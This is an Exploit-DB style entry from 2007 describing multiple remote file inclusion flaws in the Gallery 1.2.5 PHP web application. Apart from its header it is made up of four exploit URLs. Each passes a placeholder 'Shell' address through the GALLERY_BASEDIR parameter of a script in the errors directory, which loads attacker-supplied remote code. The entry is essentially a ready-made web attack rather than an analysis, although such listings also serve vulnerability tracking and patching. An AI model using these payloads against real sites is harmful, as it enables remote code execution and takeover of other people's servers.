Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions

EDB-ID:

3743

CVE:



Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-04-15


# Gallery 1.2.5 <= Remote File Include Vulnerablites
# D.Script: http://www.gnu-darwin.org/packages/x86/www/gallery-1.2.5.tgz
# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

# milw0rm.com [2007-04-15]